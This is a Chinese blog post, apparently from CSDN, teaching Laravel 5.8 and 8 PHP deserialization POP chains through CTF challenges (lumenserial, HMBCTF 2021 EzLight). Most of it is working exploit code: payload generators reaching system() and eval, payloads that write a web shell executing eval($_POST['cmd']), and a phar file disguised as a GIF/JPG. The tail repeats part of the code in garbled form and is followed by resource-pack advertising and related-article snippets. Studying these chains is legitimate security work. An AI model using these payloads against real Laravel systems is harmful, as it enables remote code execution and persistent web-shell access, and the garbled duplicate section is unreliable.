通过几道CTF题学习Laravel框架

已于 2024-01-19 16:38:21 修改
阅读量132 收藏
点赞数
文章标签: 学习 laravel android
于 2023-08-28 10:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61869253/article/details/132509844
版权

Laravel5.8.x反序列化POP链

安装:其中--prefer-dist表示优先下载zip压缩包方式

composer create-project --prefer-dist laravel/laravel=5.8.* laravel5.8

在路由文件routes/web.php中添加

Route::get('/foo', function () {  
if(isset($_GET['c'])){  
$code = $_GET['c'];  
unserialize($code);  
}  
else{  
highlight_file(__FILE__);  
}  
return "Test laravel5.8 pop";  
});

然后在public目录起一个php服务就可以进行测试了

cd /public  
php -S 0.0.0.0:port  
/foo?c=

链一

链的入口是在laravel5.8\vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php

public function __destruct()  
{  
$this->events->dispatch($this->event);  
}

这里的$this->events$this->event可控,这里把$this->events设为含有dispatch方法的Dispatcher类,我们看到laravel5.8\vendor\laravel\framework\src\Illuminate\Bus\Dispatcher.php

public function dispatch($command)  
{  
if ($this->queueResolver && $this->commandShouldBeQueued($command)) {  
return $this->dispatchToQueue($command);  
}  
return $this->dispatchNow($command);  
}

跟踪进commandShouldBeQueued

protected function commandShouldBeQueued($command)  
{  
return $command instanceof ShouldQueue;  
}

这里要求$command(即传进来的$this->event)要实现ShouldQueue该接口

headImg.action?news=158986a8-af00-4918-a559-fc3a3b4ae11a.png

满足ShouldQueue接口的实现类即可,再跟踪进dispatchToQueue看一下

public function dispatchToQueue($command)  
{  
$connection = $command->connection ?? null;  
​  
$queue = call_user_func($this->queueResolver, $connection);

这里的$this->queueResolver$connection都是可控的,到这里就可以直接构造payload

rce
<?php  
namespace Illuminate\Broadcasting {  
class PendingBroadcast {  
protected $events;  
protected $event;  
public function __construct($events, $event) {  
$this->events = $events;  
$this->event = $event;  
}  
}  
class BroadcastEvent {  
public $connection;  
public function __construct($connection) {  
$this->connection = $connection;  
}  
}  
}  
namespace Illuminate\Bus {  
class Dispatcher {  
protected $queueResolver;  
public function __construct($queueResolver){  
$this->queueResolver = $queueResolver;  
}  
}  
}  
namespace {  
$c = new Illuminate\Broadcasting\BroadcastEvent('whoami');  
$b = new Illuminate\Bus\Dispatcher('system');  
$a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);  
print(urlencode(serialize($a)));  
}
eval执行

到这里已经可以调用任意类的任意方法了,但是call_user_func无法执行eval函数,如果我们的systemban了的话,就需要继续寻找执行任意命令的函数,我们找到laravel5.8\vendor\mockery\mockery\library\Mockery\Loader\EvalLoader.php

class EvalLoader implements Loader  
{  
public function load(MockDefinition $definition)  
{  
if (class_exists($definition->getClassName(), false)) {  
return;  
}  
​  
eval("?>" . $definition->getCode());  
}  
}

这里有一个eval函数,这里需要绕过eval上面的if语句,否则直接就return

$definition变量是MockDefinition类,跟进一下

class MockDefinition  
{  
protected $config;  
protected $code;  
...  
public function getClassName()  
{  
return $this->config->getName();  
}  
public function getCode()  
{  
return $this->code;  
}  
}

这里$code$config可控,但是呢$definition->getClassName()需要一个不存在的类,我们找一个类其getName是可控的,然后构造一个不存在的类即可,如下

laravel5.8\vendor\mockery\mockery\library\Mockery\Generator\MockConfiguration.php

class MockConfiguration  
{  
...  
public function getName()  
{  
return $this->name;  
}  
...  
}

payload如下

<?php  
namespace Illuminate\Broadcasting{  
class PendingBroadcast{  
protected $events;  
protected $event;  
public function __construct($events, $event)  
{  
$this->event = $event;  
$this->events = $events;  
}  
}  
}  
namespace Illuminate\Broadcasting{  
class BroadcastEvent  
{  
public $connection;  
​  
public function __construct($connection)  
{  
$this->connection = $connection;  
}  
}  
}  
namespace Illuminate\Bus{  
class Dispatcher  
{  
protected $queueResolver;  
​  
public function __construct($queueResolver)  
{  
$this->queueResolver = $queueResolver;  
}  
}  
}  
namespace Mockery\Generator{  
class MockDefinition  
{  
protected $config;  
protected $code;  
​  
public function __construct(MockConfiguration $config)  
{  
$this->config = $config;  
$this->code = '<?php phpinfo();?>';  
}  
}  
}  
​  
namespace Mockery\Generator{  
class MockConfiguration  
{  
protected $name = "none class";  
}  
}  
​  
namespace Mockery\Loader{  
class EvalLoader  
{  
public function load(MockDefinition $definition)  
{  
​  
}  
}  
}  
namespace {  
$config = new \Mockery\Generator\MockConfiguration();  
$connection = new \Mockery\Generator\MockDefinition($config);  
$event = new \Illuminate\Broadcasting\BroadcastEvent($connection);  
$queueResolver = array(new \Mockery\Loader\EvalLoader(),"load");  
$events = new \Illuminate\Bus\Dispatcher($queueResolver);  
$pendingBroadcast = new \Illuminate\Broadcasting\PendingBroadcast($events, $event);  
echo urlencode(serialize($pendingBroadcast));  
}
利用跳板

如果说靶机禁用了system等函数,我们希望用file_put_contentsshell等双参数的函数呢,这里有一个好的跳板laravel5.8\vendor\phpoption\phpoption\src\PhpOption\LazyOption.php

final class LazyOption extends Option  
{  
...  
public function filter($callable)  
{  
return $this->option()->filter($callable);  
}  
...  
private function option()  
{  
if (null === $this->option) {  
/** @var mixed */  
$option = call_user_func_array($this->callback, $this->arguments);

这里的$this->callback$this->arguments是可控的,但是注意到option的属性是private,无法直接从我们刚刚的call_user_func直接去调用它,但是有许多类似filter的函数里面有调用option

这里可以直接构造payload

<?php  
namespace Illuminate\Broadcasting {  
class PendingBroadcast {  
protected $events;  
protected $event;  
public function __construct($events, $event) {  
$this->events = $events;  
$this->event = $event;  
}  
}  
class BroadcastEvent {  
public $connection;  
public function __construct($connection) {  
$this->connection = $connection;  
}  
}  
}  
namespace Illuminate\Bus {  
class Dispatcher {  
protected $queueResolver;  
public function __construct($queueResolver){  
$this->queueResolver = $queueResolver;  
}  
}  
}  
namespace PhpOption{  
final class LazyOption{  
private $callback;  
private $arguments;  
public function __construct($callback, $arguments)  
{  
$this->callback = $callback;  
$this->arguments = $arguments;  
}  
}  
}  
namespace {  
$d = new PhpOption\LazyOption("file_put_contents", ["shell.php", "<?php eval(\$_POST['cmd']) ?>"]);  
$c = new Illuminate\Broadcasting\BroadcastEvent('whoami');  
$b = new Illuminate\Bus\Dispatcher(array($d,"filter"));  
$a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);  
print(urlencode(serialize($a)));  
}

链二

入口同样是

public function __destruct()  
{  
$this->events->dispatch($this->event);  
}

这里转换思路,找某个类没有实现dispatch方法却有__call方法,这里就可以直接调用,找到laravel5.8\vendor\laravel\framework\src\Illuminate\Validation\Validator.php

class Validator implements ValidatorContract  
{  
...  
public function __call($method, $parameters)  
{  
$rule = Str::snake(substr($method, 8));  
​  
if (isset($this->extensions[$rule])) {  
return $this->callExtension($rule, $parameters);  
}

这里的$method是固定的字符串dispatch,传到$rule的时候为空,然后$this->extensions可控

跟踪进callExtension方法

protected function callExtension($rule, $parameters)  
{  
$callback = $this->extensions[$rule];  
​  
if (is_callable($callback)) {  
return call_user_func_array($callback, $parameters);

$callback$parameters可控,于是就可以构造payload

<?php  
namespace Illuminate\Broadcasting{  
class PendingBroadcast{  
protected $events;  
protected $event;  
​  
public function __construct($events, $event)  
{  
$this->events = $events;  
$this->event = $event;  
}  
}  
}  
​  
namespace Illuminate\Validation{  
class Validator{  
protected $extensions;  
public function __construct($extensions)  
{  
$this->extensions = $extensions;  
}  
}  
}  
​  
namespace{  
$b = new Illuminate\Validation\Validator(array(''=>'system'));  
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 'id');  
echo urlencode(serialize($a));  
}

这条链在Laravel8里面也是可以用的

利用跳板

和上面一样可以加LazyOption这个跳板

<?php  
namespace Illuminate\Broadcasting {  
class PendingBroadcast {  
protected $events;  
protected $event;  
public function __construct($events, $event) {  
$this->events = $events;  
$this->event = $event;  
}  
}  
}  
​  
namespace Illuminate\Validation {  
class Validator {  
public $extensions;  
public function __construct($extensions){  
$this->extensions = $extensions;  
}  
}  
}  
​  
namespace PhpOption {  
class LazyOption {  
private $callback;  
private $arguments;  
public function __construct($callback, $arguments) {  
$this->callback = $callback;  
$this->arguments = $arguments;  
}  
}  
}  
​  
namespace {  
$c = new PhpOption\LazyOption("file_put_contents", ["shell.php", "<?php eval(\$_POST['cmd']) ?>"]);  
$b = new Illuminate\Validation\Validator(array(''=>array($c, 'filter')));  
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 'whoami');  
print(urlencode(serialize($a)));  
}

Laravel8反序列化POP链

在下面参考链接文章中Laravel8有介绍三条链都很详细,链和上面Laravel5.8也差不太多,就不赘述,然后有一条可以phpnfo的,同样是经典入口类

laravel859\vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php

public function __destruct()  
{  
$this->events->dispatch($this->event);  
}

这里的$this->events$this->event可控

同样这里有两种方法,要不使$this->events为某个拥有dispatch方法的类,我们可以调用这个类的dispatch方法

要不就使$this->events为某个类,并且该类没有实现dispatch方法却有__call方法,那么就可以调用这个__call方法了

看到laravel859\vendor\laravel\framework\src\Illuminate\View\InvokableComponentVariable.php

public function __call($method, $parameters)  
{  
return $this->__invoke()->{$method}(...$parameters);  
}  
​  
/**  
* Resolve the variable.  
*  
* @return mixed  
*/  
public function __invoke()  
{  
return call_user_func($this->callable);  
}

这里的_call会直接调用__invoke$this->callable也是我们可控的,不过这里只能调用phpinfo,比较鸡肋,payload如下

<?php  
namespace Illuminate\Broadcasting {  
class PendingBroadcast {  
protected $events;  
protected $event;  
public function __construct($events, $event) {  
$this->events = $events;  
$this->event = $event;  
}  
}  
}  
namespace Illuminate\View {  
class InvokableComponentVariable {  
protected $callable;  
public function __construct($callable)  
{  
$this->callable = $callable;  
}  
}  
}  
​  
namespace {  
$b = new Illuminate\View\InvokableComponentVariable('phpinfo');  
$a = new Illuminate\Broadcasting\PendingBroadcast($b, 1);  
print(urlencode(serialize($a)));  
}

因为这里我们只能控制$this->callable,想要rce的话,还可以去找无参的方法里面带有call_user_func或者eval然后参数可控之类的,但是这里我找了好像没找到,读者有兴趣可以去试试

CTF题目

lumenserial

lumenserial\routes\web.php先看到路由文件

$router->get('/server/editor', 'EditorController@main');  
$router->post('/server/editor', 'EditorController@main');

再看到

lumenserial\app\Http\Controllers\EditorController.php

class EditorController extends Controller  
{  
private function download($url)  
{  
...  
$content = file_get_contents($url);

发现这里的$url传进file_get_contents可以phar反序列化,然后$url的值来源于doCatchimage方法中的$sources变量

class EditorController extends Controller  
{  
...  
protected function doCatchimage(Request $request)  
{  
$sources = $request->input($this->config['catcherFieldName']);  
$rets = [];  
​  
if ($sources) {  
foreach ($sources as $url) {  
$rets[] = $this->download($url);  
}

我们看到main发现他是通过call_user_func来调用带do开头的方法

class EditorController extends Controller  
{  
...  
public function main(Request $request)  
{  
$action = $request->query('action');  
​  
try {  
if (is_string($action) && method_exists($this, "do{$action}")) {  
return call_user_func([$this, "do{$action}"], $request);  
} else {

可以通过如下控制变量

http://ip/server/editor/?action=Catchimage&source[]=phar://xxx.gif

然后在上面的5.8链的基础加上如下

@unlink("test.phar");  
$phar = new \Phar("test.phar");//后缀名必须为phar  
$phar->startBuffering();  
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');//设置stub  
$phar->setMetadata($pendingBroadcast);//将自定义的meta-data存入manifest  
$phar->addFromString("test.txt", "test");//添加要压缩的文件  
$phar->stopBuffering();

上传phar文件再用phar协议打即可

headImg.action?news=968e882f-1398-4eac- ad72-9b18e8e37fe8.png

[HMBCTF 2021]EzLight

给了source.zip源码,是laravel框架开发的lightcms,先在本地把环境搭起来先,主要是修改.env文件改改数据库信息

先看到source\source\app\Http\Controllers\Admin\NEditorController.php

public function catchImage(Request $request)  
{  
...  
$files = array_unique((array) $request->post('file'));  
$urls = [];  
foreach ($files as $v) {  
$image = $this->fetchImageFile($v);

catchImage函数里面以post传给file参数再给到fetchImageFile$url

protected function fetchImageFile($url)  
{  
if (isWebp($data)) {  
$image = Image::make(imagecreatefromwebp($url));  
$extension = 'webp';  
} else {  
$image = Image::make($data);  
}

这里的$url可控,这里imagecreatefromwebp因为isWebp的限制无法进入,所以这里的分支是进入Image::make($data);来,我们在此处下一个断点,然后分析一下前面的代码,我们需要在vps上放一个图片的链接,然后在http://127.0.0.1:9001/admin/neditor/serve/catchImage传参数即可动态调试了

然后一直跟进就可以发现有个file_get_contents函数

headImg.action?news=1d3849c2-8ec7-455b-9731-0e1da60e6324.png

至此结束,这里可以phar反序列化了

用上面的链一即可

<?php
namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($events, $event) {
            $this->events = $events;
            $this->event = $event;
        }
    }
    class BroadcastEvent {
        public $connection;
        public function __construct($connection) {
            $this->connection = $connection;
        }
    }
}
namespace Illuminate\Bus {
    class Dispatcher {
        protected $queueResolver;
        public function __construct($queueResolver){
            $this->queueResolver = $queueResolver;
        }
    }
}
namespace PhpOption{
    final class LazyOption{
        private $callback;
        private $arguments;
        public function __construct($callback, $arguments)
        {
            $this->callback = $callback;
            $this->arguments = $arguments;
        }
    }
}
namespace {
    $d = new PhpOption\LazyOption("file_put_contents", ["shell.php", "<?php phpinfo();eval(\$_POST['cmd']);?>"]);
    $c = new Illuminate\Broadcasting\BroadcastEvent('whoami');
    $b = new Illuminate\Bus\Dispatcher(array($d,"filter"));
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);
    print(urlencode(serialize($a)));

    @unlink("test.phar");
    $phar = new \Phar("test.phar");//后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');//设置stub
    $phar->setMetadata($a);//将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test");//添加要压缩的文件
    $phar->stopBuffering();
    rename('test.phar','test.jpg');
}

上传之后,在vps上放

phar://./upload/image/202105/uwQGQ5sBTWRppO3lfHzOpxLkKODMS9NkrYHdobkz.gif

再到/admin/neditor/serve/catchImagefile传参打就可以了

本文涉及相关实验:[PHP反序列化漏洞实验](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182016010714511600001&pk_campaign=freebuf-
wemedia)(通过本次实验,大家将会明白什么是反序列化漏洞,反序列化漏洞的成因以及如何挖掘和预防此类漏洞。)

ew \Phar(“test.phar”);//后缀名必须为phar
$phar->startBuffering();
$phar->setStub(‘GIF89a’.‘<?php __HALT_COMPILER();?>’);//设置stub
p h a r − > s e t M e t a d a t a ( phar->setMetadata( phar>setMetadata(a);//将自定义的meta-data存入manifest
$phar->addFromString(“test.txt”, “test”);//添加要压缩的文件
$phar->stopBuffering();
rename(‘test.phar’,‘test.jpg’);
}

上传之后,在vps上放

phar://./upload/image/202105/uwQGQ5sBTWRppO3lfHzOpxLkKODMS9NkrYHdobkz.gif

再到/admin/neditor/serve/catchImagefile传参打就可以了

本文涉及相关实验:[PHP反序列化漏洞实验](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182016010714511600001&pk_campaign=freebuf-
wemedia)(通过本次实验,大家将会明白什么是反序列化漏洞,反序列化漏洞的成因以及如何挖掘和预防此类漏洞。)

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

python-qing
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
搜索 一道CTF引起的对laravel v8.32.1序列化利用链挖掘
jklbnm12的博客
07-15 340
目录 0x00 前言 0x01 利用条件 0x02 环境配置 0x03 链条分析 call_user_func([可控],[可控]) 网络安全学习资料点击白嫖 call_user_func([可控],[可控],[可控]) call_user_func_array([完全可控]) eval([完全可控]) 0x00 前言 前几天刚搞完V&NCTF,里边有一道easy_laravel目引起了我的注意(指挖了一下午的序列化链,结果路由不正确无法利用CVE反序列化,呜呜呜,气...
laravel框架学习(路由)
野蛮秘籍
03-08 3493
laravel所有的路由都定义在/app/Http/routes.php文件中,视图定义在/app/resources/views/里1、路由基本使用实例1.1、默认首页Route::get('/', function () { return view('welcome'); }); 当访问应用首页http://selfstudy.com的时候,返回/resources/views/we
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 2796
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
[VNCTF 2021]Easy_laravel-PHP代码审计&CVE-2021-3129学习记录
cjdgg的博客
04-05 1567
[VNCTF 2021]Easy_laravel-PHP代码审计学习记录 上次做完那道代码审计后,好巧不巧,又有新的php代码审计,也是Laravel,话不多说,进入正一进入就是这个页面,看到这个页面就想起了之前拿CVE打过的一个靶机,于是看了下版本号找找有没有CVE可以打 谷歌搜了下laravel 8.22.1 exploit,很绝望,这个版本几乎都是CVE的修复版本,没有可用的CVE,这还提供了源代码,那就只能慢慢看了 又是熟悉的N多个文件夹,依旧是先全局搜索_destruct找可以用
Laravel基础用法学习(一)
冷静
03-24 592
Laravel 里面推荐的模板赋值方式: 1,单个变量赋值用with()方法。 还可以链式使用。return view()->with('name')->with('names',$name); 项目根目录/resources/view 层 2,多个变量赋值方法。 用一个数组装起来。 项目根目录/resources/view 层 ...
Laravel框架使用搭建教程
西里古里的博客
01-24 315
一款 PHP 语言基于 Laravel8、Layui、MySQL等框架精心打造的一款模块化、插件化、高性能的前后端分离架构敏捷开发框架,可用于快速搭建前后端分离后台管理系统,本着简化开发、提升开发效率的初衷,框架自研了一套个性化的组件,实现了可插拔的组件式开发方式:单图上传、多图上传、下拉选择、开关按钮、单选按钮、多选按钮、图片裁剪等等一系列个性化、轻量级的组件,是一款真正意义上实现组件化开发的敏捷开发框架框架已集成了完整的RBAC权限架构和常规基础模块,同时支持多主切换,可以根据自己喜欢的风格选择想一
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
CTF100.docx
05-25
在解模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战目的分值和时间来排名,通常用于在线选拔赛。目主要包含逆向、...
ctfCTF理论考核及答案
07-05
content-Type检测可以通过修改数据包中的content-Type字段绕过,而00截断利用的是文件系统在遇到00时停止读取的特点。 5. **Linux文件权限**:在Linux中,"rw-"代表具有读和写权限,但没有执行权限。正确答案是B。 ...
CTF理论考核及答案 ctf
02-21
CTF理论考核及答案 ctf库 1.readme.txt中哪一部分是扩展名 A、readme B、readme. C、.txt D、me.txt 参考答案:C 2.关于html语言,描述错误的有 A、html语言不区分大小写 B、浏览器可以直接解释执行html代码 C...
laravel 5入门系列——4
Hustcw Blog
01-18 908
Laravel进军4 什么是Artisan命令 Artisan 是 Laravel 自带的命令行接口,它提供了许多实用的命令来帮助你构建 Laravel 应用。要查看所有可用的 Artisan 命令的列表,可以使用 list 命令:php artisan list .每个命令包含了「帮助」界面,它会显示并概述命令的可用参数及选项。只需要在命令前面加上 help 即可查看命令帮助界面
laravel 实战随笔
Hustcw Blog
01-30 432
laravel 实战踩坑——随笔 1. 表单提交必填method,action,{{csrf_field()}} 2. index.php无法打开文件的话,进项目composer install 3. 数据库默认字段不为空,报错的时候应该看一看 4. 所有前端引用前面要加/表示绝对路径引用,不然无法渲染 5. 如果路由和控制器都没写错,还报错方法不存在,可以尝试: composer
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 4941
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
[MRCTF2021]ez_laravel复现
fightte的博客
05-21 591
前言 还是之前打的mrctf,难度比较大,也是第一次正式比赛出现了lara目,近来多数比赛,包括CISCN都习惯出lara的目,算是比较好的框架,但当时被带的做起了,现在复现一次: 考察的是Laravel的CVE-2019-9081,影响版本为5.7.x,当时别个搜CVE也能搜出来,先下载下来,lara5.7 但lara5.7里面没有vendor,在文件夹下,用cmd命令 composer install就可产生: 开始对比: 主要差别确实就是MRCTF的www_laravel,其app/Http/
Lumos学习王佩丰Excel第四讲:排序与选择
最新发布
Sunshine_XX的博客
07-10 275
自定义排序演示:工资条拆分的演示:如果遇到很长的表,标只存在于顶端,打印出来观感不好,可以这样做:有些版本的excel复制筛选数据容易把背后隐藏的所有数据都复制上去,这时可选中定位条件的“可见单元格”选项,复制粘贴即可。并排表示且,错排表示或。ctrl+shift+↓+→全选,演示说明:回头学原理,先记住一句话,要想筛选对,条件表头不要对。
网络安全选择ctf 63w字
07-19
本网络安全选择库共计63万字,内容涵盖了大量关于网络安全知识,专门针对ctf比赛中的选择进行了整理和汇总。其中包括了一系列问,如第38中若漏洞威胁描述为“低影响度,中等严重度”,则该漏洞威胁等级为A...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值